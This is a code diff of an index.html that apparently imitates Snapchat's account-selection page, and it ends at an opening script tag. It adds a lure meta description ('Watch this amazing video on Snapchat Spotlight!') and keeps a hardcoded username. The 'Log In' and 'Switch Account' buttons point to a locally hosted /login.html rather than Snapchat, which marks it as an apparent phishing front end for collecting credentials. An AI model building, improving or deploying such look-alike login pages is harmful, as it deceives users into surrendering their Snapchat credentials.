--- a/index.html
+++ b/index.html
@@ -1,11 +1,13 @@
 <!DOCTYPE html>
+
 <html lang="en">
 <head>
   <meta charset="UTF-8">
-  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
-  <link rel="shortcut icon" href="/faviconV2.png">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0 user-scalable=no">
 
-  
+  <link rel="shortcut icon" href="/faviconV2.png">
+  <meta name="description" content="Watch this amazing video on Snapchat Spotlight! Here's a brief description of the content.">
+
   <title>Snapchat</title>
   <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500&display=swap" rel="stylesheet">
   <style>
@@ -17,10 +19,10 @@
       -webkit-tap-highlight-color: rgba(255, 255, 255, 0) !important;
       outline: none !important;
     }
-    
-    /* Body Styling */
+  
+    /* Disable caret globally */
     body {
-      caret-color:transparent;
+      caret-color: transparent;
       font-family: 'Poppins', sans-serif;
       background-color: #FFFC00;
       display: flex;
@@ -30,7 +32,7 @@
       height: 100vh;
       text-align: center;
     }
-
+  
     /* Loading Screen Styling */
     .loader-overlay {
       position: fixed;
@@ -47,24 +49,24 @@
       visibility: visible;
       transition: opacity 0.5s ease, visibility 0.5s ease;
     }
-
+  
     /* Hide the loader with smooth transition */
     .loaded .loader-overlay {
       opacity: 0;
       visibility: hidden;
     }
-
+  
     .container-loader {
       display: flex;
       justify-content: center;
       align-items: center;
     }
-
+  
     .circle {
       position: absolute;
       border-radius: 50px;
     }
-
+  
     #circle-rotation {
       width: 35px;
       height: 35px;
@@ -73,7 +75,7 @@
       border-bottom-color: transparent;
       animation: spin 1s linear infinite;
     }
-
+  
     #circle-2-rotation {
       width: 20px;
       height: 20px;
@@ -82,7 +84,7 @@
       border-bottom-color: transparent;
       animation: spin2 0.95s linear infinite;
     }
-
+  
     @keyframes spin {
       from {
         transform: rotate(0deg);
@@ -91,7 +93,7 @@
         transform: rotate(360deg);
       }
     }
-
+  
     @keyframes spin2 {
       from {
         transform: rotate(360deg);
@@ -100,7 +102,7 @@
         transform: rotate(0deg);
       }
     }
-
+  
     /* Main Container */
     .container {
       flex: 1;
@@ -109,16 +111,16 @@
       justify-content: center;
       align-items: center;
     }
-
+  
     .logo img {
       width: 50px;
       margin-top: 20px;
     }
-
+  
     .avatar-container {
       margin-bottom: 20px;
     }
-
+  
     .avatar {
       width: 120px;
       height: 120px;
@@ -126,20 +128,20 @@
       border: 4px solid #FFFC00;
       background-color: #fffd80;
     }
-
+  
     .avatar img {
       width: 100%;
       height: 100%;
       object-fit: cover;
     }
-
+  
     .username {
       margin-top: -10px;
       font-size: 15px;
       font-weight: 600;
       color: black;
     }
-
+  
     .remove-account {
       font-size: 12px;
       color: #00A6FF;
@@ -147,34 +149,34 @@
       margin-bottom: 40px;
       cursor: pointer;
       font-weight: 600;
-
     }
-
+  
     .login-btn {
-  background-color: #00A6FF;
+      background-color: #00A6FF;
       color: white;
       border: none;
       font-size: 16px;
       width: 175px;
       padding: 12px 0;
       border-radius: 25px;
-      margin-bottom: 76px;
+      margin-bottom: 20px; /* Adjust for spacing above fixed buttons */
       cursor: pointer;
       transition: background-color 0.3s ease;
       box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2); /* Shadow effect */
     }
-
+  
     .login-btn:hover {
       background-color: #008ed6;
     }
-
+  
     .button-container {
       display: flex;
       width: 100%;
-      position: fixed;
+      
       bottom: 0;
+      margin-top: 20px;
     }
-
+  
     .button {
       flex: 1;
       height: 50px;
@@ -182,20 +184,28 @@
       text-align: center;
       line-height: 50px;
       background-color: transparent;
-      border: none;
       font-weight: 600;
+      cursor: pointer;
     }
-
+  
     .button:nth-child(2) {
       border-left: 2px solid #dfdb00;
     }
-
+  
     .button:active {
       opacity: 0.8;
     }
-    a{
-    text-decoration: none;
-  }
+  
+    a {
+      text-decoration: none;
+    }
+  
+    /* Responsive adjustments for smaller screens */
+    @media (max-width: 768px) {
+      .login-btn {
+        margin-bottom: 20px; /* Adjust spacing for smaller screens */
+      }
+    }
   </style>
 </head>
 <body>
@@ -220,14 +230,16 @@
     </div>
 
     <div class="username">tejazmali</div>
-   <a href="https://help.snapchat.com/hc/en-us/articles/7012328360596-How-do-I-deactivate-or-delete-my-Snapchat-account"> <div class="remove-account">Remove account</div></a>
+    <a href="https://help.snapchat.com/hc/en-us/articles/7012328360596-How-do-I-deactivate-or-delete-my-Snapchat-account">
+      <div class="remove-account">Remove account</div>
+    </a>
   </div>
 
   <button class="login-btn" onclick="window.location.href='/login.html';">Log In</button>
 
   <div class="button-container">
-    <button class="button" onclick="window.location.href='https://accounts.snapchat.com/v2/signup';">Sign Up</button>
-    <button class="button" onclick="window.location.href='/login.html';">Switch Account</button>
+    <div class="button" onclick="window.location.href='https://accounts.snapchat.com/v2/signup';">Sign Up</div>
+    <div class="button" onclick="window.location.href='/login.html';">Switch Account</div>
   </div>
 
   <script>
